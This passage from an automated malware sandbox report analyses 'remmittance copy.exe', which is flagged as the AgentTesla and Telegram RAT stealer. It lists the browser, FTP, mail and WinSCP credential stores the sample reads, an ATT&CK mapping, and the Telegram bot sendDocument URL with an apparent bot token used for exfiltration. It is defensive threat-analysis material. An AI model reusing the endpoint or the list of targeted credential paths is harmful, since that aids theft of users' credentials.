                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Users\user\Desktop\remmittance copy.exe VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\remmittance copy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Telegram RAT
Source: Yara match | File source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.remmittance copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.remmittance copy.exe.3b39030.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\remmittance copy.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\remmittance copy.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\remmittance copy.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\remmittance copy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT
Source: Yara match | File source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.remmittance copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.remmittance copy.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.remmittance copy.exe.3b39030.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation211 | Path Interception | Process Injection112 | Masquerading1 | OS Credential Dumping2 | Query Registry1 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Web Service1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | Credentials in Registry1 | Security Software Discovery211 | Remote Desktop Protocol | Archive Collected Data11 | Exfiltration Over Bluetooth | Encrypted Channel11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion141 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Local System2 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion141 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Application Window Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | System Information Discovery114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                      Behavior Graph

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

Screenshots

(Screenshot thumbnails are not reproduced in this text rendering.)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
5.0.remmittance copy.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
5.0.remmittance copy.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
5.0.remmittance copy.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
5.2.remmittance copy.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
5.0.remmittance copy.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
5.0.remmittance copy.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://NoCGvF.com | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://www.fontbureau.commna | 0% | Avira URL Cloud | safe
http://www.fontbureau.comcomm | 0% | Avira URL Cloud | safe
https://qEv5A6okmkiAozFZ9P4.org | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
https://api.telegram.org4.l | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument | false | | high

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://NoCGvF.com | remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.apache.org/licenses/LICENSE-2.0 | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocumentdocument----- | remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | false | | high
http://DynDns.comDynDNS | remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.commna | remmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comcomm | remmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://qEv5A6okmkiAozFZ9P4.org | remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/ | remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | false | | high
http://www.fontbureau.com/designers | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.coma | remmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.collada.org/2005/11/COLLADASchema9Done | remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.fonts.com | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4.l | remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | remmittance copy.exe, 00000005.00000002.925105112.0000000003512000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                                                        Contacted IPs

                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510735
Start date: 28.10.2021
Start time: 07:38:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 24s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: remmittance copy.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.91.112.76, 40.112.88.60, 52.251.79.25, 80.67.82.211, 80.67.82.235, 20.82.210.154
• Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

Time | Type | Description
07:39:15 | API Interceptor | 727x Sleep call for process: remmittance copy.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

Match: 149.154.167.220
Associated Sample Name / URL | Detection
DHL_Shipment_Notification.exe | malicious
RFQ TESDA PROJECT.exe | malicious
DHL_waybill20212810.exe | malicious
PR-007493 PR-007495.exe | malicious
hSNPFOpBGX.exe | malicious
PR-007493 PR-007495.exe | malicious
N9FpyeJiD6.exe | malicious
tEodoA3rYx.exe | malicious
Documents Of Shipping.exe | malicious
Request for quotation.exe | malicious
Dhl Parcel.exe | malicious
Purchase Order.exe | malicious
Proforma invoice INV2.pdf.exe | malicious
PROFORMA COPY.exe | malicious
Urgent Order.exe | malicious
Proforma invoice INV8.pdf.exe | malicious
Proforma invoice INV15.pdf.exe | malicious
invoice.exe | malicious
PbPJG6PBnmrxM35.exe | malicious
QVJHJ4CTW3iTs71.exe | malicious

                                                                                                Domains

Match: api.telegram.org
Associated Sample Name / URL | Detection | Context
DHL_Shipment_Notification.exe | malicious | 149.154.167.220
RFQ TESDA PROJECT.exe | malicious | 149.154.167.220
DHL Shipping Documents REF - WAYBILL 44 7611 9546.exe | malicious | 149.154.167.220
DHL_waybill20212810.exe | malicious | 149.154.167.220
PR-007493 PR-007495.exe | malicious | 149.154.167.220
LB37AEeWAz.exe | malicious | 149.154.167.220
hSNPFOpBGX.exe | malicious | 149.154.167.220
DpJvbZvtGs.exe | malicious | 149.154.167.220
RFI5d7WHzQ.exe | malicious | 149.154.167.220
PR-007493 PR-007495.exe | malicious | 149.154.167.220
LauncherHack.exe | malicious | 149.154.167.220
N9FpyeJiD6.exe | malicious | 149.154.167.220
tEodoA3rYx.exe | malicious | 149.154.167.220
Documents Of Shipping.exe | malicious | 149.154.167.220
Request for quotation.exe | malicious | 149.154.167.220
Dhl Parcel.exe | malicious | 149.154.167.220
Purchase Order.exe | malicious | 149.154.167.220
Proforma invoice INV2.pdf.exe | malicious | 149.154.167.220
PROFORMA COPY.exe | malicious | 149.154.167.220
Urgent Order.exe | malicious | 149.154.167.220

                                                                                                ASN

Match: TELEGRAMRU
Associated Sample Name / URL | Detection | Context
DHL_Shipment_Notification.exe | malicious | 149.154.167.220
RFQ TESDA PROJECT.exe | malicious | 149.154.167.220
DHL_waybill20212810.exe | malicious | 149.154.167.220
PR-007493 PR-007495.exe | malicious | 149.154.167.220
DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe | malicious | 149.154.167.99
http___backupsoldyn.duckdns.org_11d_solex.exe | malicious | 149.154.167.99
http___backupsoldyn.duckdns.org_11d_solex.exe | malicious | 149.154.167.99
